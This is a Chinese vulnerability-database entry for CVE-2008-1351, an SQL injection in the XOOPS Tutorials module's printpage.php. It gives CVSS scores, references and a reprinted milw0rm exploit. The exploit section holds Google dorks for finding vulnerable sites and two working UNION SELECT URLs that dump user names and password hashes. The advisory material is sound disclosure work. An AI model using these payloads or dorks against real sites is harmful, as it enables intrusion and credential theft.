CVE-2008-1351 |
|
发布时间 :2008-03-17 12:44:00 | ||
修订时间 :2009-09-01 01:14:31 | ||||
NMCOE |
[原文]SQL injection vulnerability in the Tutorials 2.1b module for XOOPS allows remote attackers to execute arbitrary SQL commands via the tid parameter to printpage.php, which is accessible directly or through a printpage action to index.php.
[CNNVD]XOOPS Tutorials 多个SQL注入漏洞(CNNVD-200803-244)
XOOPS Tutorials模块中存在SQL注入漏洞。远程攻击者通过tid参数直接到达printpage.php或经过一个printpage操作到达index.php,以执行任意SQL命令。
–
CVSS (基础分值)
CVSS分值: | 7.5 | [严重(HIGH)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://www.securityfocus.com/bid/28230 (UNKNOWN) BID 28230 |
http://www.milw0rm.com/exploits/5245 (UNKNOWN) MILW0RM 5245 |
http://secunia.com/advisories/29358 (VENDOR_ADVISORY) SECUNIA 29358 |
–
漏洞信息
XOOPS Tutorials 多个SQL注入漏洞 | |
高危 | SQL注入 |
2008-03-17 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
XOOPS Tutorials模块中存在SQL注入漏洞。远程攻击者通过tid参数直接到达printpage.php或经过一个printpage操作到达index.php,以执行任意SQL命令。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.xoops.org/ |
–
漏洞信息 (5245)
XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability (EDBID:5245) |
|
php | webapps |
2008-03-12 | Verified |
0 | S@BUN |
N/A |
[点击下载] |
########################################## # # # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####MAÄ°L : [email protected] # ########################################### # # DORKS 1 : allinurl :"/modules/tutorials/" # # DORK 2 : allinurl :"/modules/tutorials/"tid # ########################################### EXPLOIT 1 : modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/* EXPLOIT 2 : modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/* ########################################### ##################S@BUN#################### ########################################### #####[email protected]##### ########################################### # milw0rm.com [2008-03-12]
–
漏洞信息
42876 |
|
Tutorials Module for XOOPS printpage.php tid Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
Tutorials Module for XOOPS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'printpage.php' script not properly sanitizing user-supplied input to the 'tid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database. |
–
时间线
2008-03-12 |
Unknow |
2008-03-12 | Unknow |